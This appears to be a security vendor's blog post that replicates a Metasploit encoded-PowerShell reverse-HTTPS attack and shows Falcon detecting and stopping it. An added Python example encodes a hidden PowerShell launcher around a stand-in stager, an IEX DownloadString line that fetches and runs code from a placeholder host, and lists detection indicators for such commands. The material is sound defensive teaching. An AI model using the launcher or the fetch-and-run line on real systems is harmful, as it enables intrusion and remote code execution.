Fileless and script-based attacks are on the rise. Their growth is attributed to their evasion capability: because nothing malicious is written to disk, these attacks avoid detection by traditional, file-scanning AV solutions. In an article on pentestlab.blog the author illustrates how a simple script produced by a widely available tool can bypass security measures. In this article we’ll illustrate Falcon using multiple detection capabilities to prevent script-based attacks.
For this article we’ve replicated the script used in that blog post and then attempted to run it on a host protected by Falcon. To do this, I used an updated version of Kali Linux as the attacker and a host running Windows 7 as the target.
Step 1: Generate a Certificate
The generated script is an encoded PowerShell command that establishes an encrypted connection from the target back to the attacker. Because the channel is encrypted, a host intrusion prevention system (HIPS) cannot inspect the packets it carries.
The following steps are taken directly from the blog post on pentestlab.blog.
To generate a certificate for the encrypted channel I used the Metasploit module impersonate_ssl and chose a common domain to impersonate. Once the module completes, verify that the generated certificate file is on the desktop.
Step 2: Configure the Listener
This step isn’t in the same order as in the original article, but it accomplishes the same goal. Once the payload is executed (I’ll create the payload in the next step), an encrypted session between the victim and the attacker will be established. This prevents the HIPS from inspecting the traffic, and removes any protection that inspection may have provided.
Step 3: Generate a Payload
Metasploit’s msfvenom is used to generate the payload. In this case the payload is an encoded PowerShell command that opens the encrypted reverse connection, and it leverages the certificate generated in step 1 for that connection.
How Falcon Protects Against Script-based Attacks
The Falcon Platform is a single agent with multiple capabilities. In this scenario I’ll use the Falcon Prevent capabilities to identify what this threat is trying to accomplish and to stop it.
In the alert below we see a process tree that gives a clear picture of how this attack works and what it’s trying to accomplish. explorer.exe launches a command prompt, and in that command prompt the command line opens the batch script created with Metasploit.
Looking at the next two steps we see that the new command prompt calls PowerShell and runs an encoded command. The subsequent PowerShell process is that same encoded command executing.
Finally, the last process is the attempted execution of the encoded script. In this instance there are three separate suspicious behaviors, although Falcon needs only one of them to prevent the attack. The green text indicates that a suspicious process was identified and prevented. Next, Falcon recognizes that PowerShell was run with an encoded command, which is itself suspicious. Finally, the presence of Metasploit’s Meterpreter is identified as it is loaded into a process.
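To make the two halves of this walk-through concrete, here is an added example (it is not Falcon’s detection logic and not the script from pentestlab.blog): it builds an encoded PowerShell launcher in the style of the msfvenom payload from step 3, then runs simple detection logic over a constructed process tree like the one in the alert (explorer.exe to cmd.exe to cmd.exe to powershell.exe). The psh-cmd launcher layout, the indicator lists, and the sample events are all assumptions made for the example; the "stager" it encodes is a harmless stand-in, not Meterpreter.

```python
"""Added example (not Falcon's or pentestlab's code): build an encoded
PowerShell launcher in the style of a msfvenom psh-cmd payload, then run
simple detection logic over a constructed process tree like the one in the
Falcon alert. Indicator lists and the psh-cmd layout are assumptions."""
import base64
import binascii
import shlex

# powershell.exe accepts -EncodedCommand, its documented aliases -ec and -e,
# and any unambiguous prefix of the full name, so match all of them.
ENCODED_SWITCHES = {"encodedcommand"[:n] for n in range(1, 15)} | {"ec"}

# Strings that are suspicious inside a decoded script body (assumed list for
# this example, not a vendor signature set).
SCRIPT_INDICATORS = ("IEX", "Invoke-Expression", "Net.WebClient",
                     "DownloadString", "FromBase64String",
                     "ServicePointManager", "https://")

# Launcher switches that hide the window or bypass profile/execution policy.
SWITCH_INDICATORS = ("-nop", "-noprofile", "-w hidden", "-windowstyle hidden",
                     "-ep bypass", "-exec bypass")


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def psh_cmd_wrapper(script: str) -> str:
    """One-line batch launcher: cmd.exe starts a hidden PowerShell that runs
    the encoded script. Layout modelled on msfvenom's psh-cmd format (assumed;
    Metasploit's exact string may differ)."""
    return ("%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e "
            + encode_powershell(script))


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    tokens = shlex.split(cmdline, posix=False)
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in ("-", "/") and tok[1:].lower() in ENCODED_SWITCHES:
            blob = tokens[i + 1].strip('"')
            blob += "=" * (-len(blob) % 4)          # tolerate stripped padding
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def analyze_event(event: dict) -> dict:
    """Score one process-creation event (parent, image, cmdline) and return it
    with the decoded script (if any) and the reasons it looks suspicious."""
    reasons = []
    decoded = None
    image = event["image"].lower()
    cmd = event["cmdline"]
    lowered = " ".join(cmd.lower().split())
    if image.endswith("powershell.exe"):
        reasons += [f"launcher switch {s}" for s in SWITCH_INDICATORS if s in lowered]
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            reasons.append("encoded command")
            reasons += [f"decoded script contains {ind}" for ind in SCRIPT_INDICATORS
                        if ind.lower() in decoded.lower()]
    elif (image.endswith("cmd.exe") and ".bat" in cmd.lower()
          and event["parent"].lower().endswith("explorer.exe")):
        reasons.append("batch file launched from explorer.exe")
    return {**event, "decoded": decoded, "reasons": reasons}


# Constructed stand-in for a reverse-HTTPS stager: it is NOT Meterpreter, it
# only uses the kinds of calls such a stager would (TEST-NET address).
SAMPLE_SCRIPT = (
    "[Net.ServicePointManager]::ServerCertificateValidationCallback={$true};"
    "IEX (New-Object Net.WebClient).DownloadString('https://192.0.2.10:443/a')"
)

# Constructed process tree mirroring the alert: explorer -> cmd (batch file)
# -> cmd (launcher line) -> powershell -e <blob>.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\victim\Desktop\payload.bat"},
    {"parent": "cmd.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": psh_cmd_wrapper(SAMPLE_SCRIPT)},
    {"parent": "cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -e " + encode_powershell(SAMPLE_SCRIPT)},
]


def analyze_tree(events=SAMPLE_EVENTS) -> list:
    """Analyze every event; any event with reasons would be a prevention candidate."""
    return [analyze_event(e) for e in events]


if __name__ == "__main__":
    for r in analyze_tree():
        print(r["image"].rsplit("\\", 1)[-1], "->", r["reasons"] or "clean")
```

Two points worth noting from running it. The encoded blob itself tells you nothing until it is decoded as UTF-16LE, which is why the decoding step comes before any content matching; and the launcher switches (-nop, -w hidden) are visible on the command line even when the blob is unreadable, so they are worth alerting on in their own right. As in the alert, the last process in the tree collects several independent reasons, any one of which would justify a prevention.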
On the right, in the details pane, we get additional information on what the script was trying to accomplish. The Network Operations section identifies the attacker’s server and shows that communications went over port 443. In the Disk Operations section a list of all the DLLs and files read and written to disk is available for further investigation.
Script-based and other fileless attacks are on the rise because they can avoid detection by both new and old detection capabilities. CrowdStrike utilizes many types of detection methods to both identify and stop the broad range of attack vectors in use today.